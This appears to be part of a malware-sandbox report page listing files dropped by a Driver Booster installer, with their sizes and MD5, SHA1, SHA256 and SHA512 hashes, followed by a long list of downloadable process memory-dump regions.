4e957c9b0c9c6e2f0b4404201807a631ee16c599cebe16089d0a6e0c059059c2a0944a1c44dac354eee95fc588633fe8913aed7abf8b7061ca77237fc8a0007e

Download Submit
\Users\Admin\AppData\Local\Temp\is-MP2JM.tmp\Driver.Booster.10.0.0.65.exe

Filesize
28.4MB

MD5
cdf3d43e50622011984ed17718ce8a90

SHA1
65b0bb629a98643c4c5e33f53de75255678fbe9b

SHA256
36ec957fb97cdc1ccf17208f1df58437cb724a34b3106e6bdb91ed35b676da0b

SHA512
c2ea4ef66dffd4b1d1e12ad89c5e94919051f53022a23c91462330b7bc5a028f8631e6602fd6ca71ee0d9dce7363a01d5dfa0d7ad0e977d639bbca59d86bb67e

Download Submit
\Users\Admin\AppData\Local\Temp\is-MP2JM.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
memory/348-552-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/348-503-0x0000000010000000-0x0000000010237000-memory.dmp

Filesize
2.2MB

Download
memory/444-96-0x00000000006A0000-0x00000000006AF000-memory.dmp

Filesize
60KB

Download
memory/444-98-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/444-94-0x00000000745E0000-0x00000000745FB000-memory.dmp

Filesize
108KB

Download
memory/444-93-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/444-69-0x00000000006A0000-0x00000000006AF000-memory.dmp

Filesize
60KB

Download
memory/444-95-0x0000000074300000-0x0000000074311000-memory.dmp

Filesize
68KB

Download
memory/444-49-0x00000000745E0000-0x00000000745FB000-memory.dmp

Filesize
108KB

Download
memory/444-586-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/444-559-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/444-561-0x0000000074300000-0x0000000074311000-memory.dmp

Filesize
68KB

Download
memory/444-67-0x0000000074300000-0x0000000074311000-memory.dmp

Filesize
68KB

Download
memory/444-562-0x00000000006A0000-0x00000000006AF000-memory.dmp

Filesize
60KB

Download
memory/444-560-0x00000000745E0000-0x00000000745FB000-memory.dmp

Filesize
108KB

Download
memory/1320-627-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1508-787-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/1508-784-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1508-790-0x0000000071E60000-0x00000000726DD000-memory.dmp

Filesize
8.5MB

Download
memory/1508-789-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/1508-791-0x0000000002290000-0x000000000239D000-memory.dmp

Filesize
1.1MB

Download
memory/1508-782-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1508-793-0x0000000050000000-0x0000000050116000-memory.dmp

Filesize
1.1MB

Download
memory/1508-792-0x0000000000400000-0x00000000004E3000-memory.dmp

Filesize
908KB

Download
memory/1508-794-0x0000000050120000-0x000000005030D000-memory.dmp

Filesize
1.9MB

Download
memory/1652-547-0x0000000059800000-0x000000005986E000-memory.dmp

Filesize
440KB

Download
memory/1652-546-0x0000000050000000-0x0000000050116000-memory.dmp

Filesize
1.1MB

Download
memory/1652-550-0x0000000057800000-0x0000000057812000-memory.dmp

Filesize
72KB

Download
memory/1652-545-0x0000000000400000-0x0000000000CBA000-memory.dmp

Filesize
8.7MB

Download
memory/1652-549-0x0000000050120000-0x000000005030D000-memory.dmp

Filesize
1.9MB

Download
memory/1652-548-0x0000000057000000-0x000000005703F000-memory.dmp

Filesize
252KB

Download
memory/2176-0-0x0000000000400000-0x0000000000500000-memory.dmp

Filesize
1024KB

Download
memory/2176-80-0x0000000000400000-0x0000000000500000-memory.dmp

Filesize
1024KB

Download
memory/2176-2-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download
memory/2324-78-0x0000000000400000-0x000000000073B000-memory.dmp

Filesize
3.2MB

Download
memory/2324-8-0x0000000000400000-0x000000000073B000-memory.dmp

Filesize
3.2MB

Download
memory/2428-593-0x0000000000290000-0x0000000000291000-memory.dmp

Filesize
4KB

Download
memory/2428-599-0x0000000005DF0000-0x0000000005EFD000-memory.dmp

Filesize
1.1MB

Download
memory/2428-613-0x000000000B010000-0x000000000B024000-memory.dmp

Filesize
80KB

Download
memory/2428-588-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/2428-651-0x000000000BF60000-0x000000000BFF2000-memory.dmp

Filesize
584KB

Download
memory/2428-601-0x0000000005F00000-0x0000000005F9B000-memory.dmp

Filesize
620KB

Download
memory/2428-600-0x0000000006A70000-0x0000000006B40000-memory.dmp

Filesize
832KB

Download
memory/2428-602-0x0000000009CA0000-0x0000000009DF9000-memory.dmp

Filesize
1.3MB

Download
memory/2428-598-0x0000000071E60000-0x00000000726DD000-memory.dmp

Filesize
8.5MB

Download
memory/2428-590-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/2428-592-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/2428-595-0x0000000000290000-0x0000000000291000-memory.dmp

Filesize
4KB

Download
memory/2428-597-0x0000000000290000-0x0000000000291000-memory.dmp

Filesize
4KB

Download
memory/2452-23-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/2452-587-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/2452-92-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download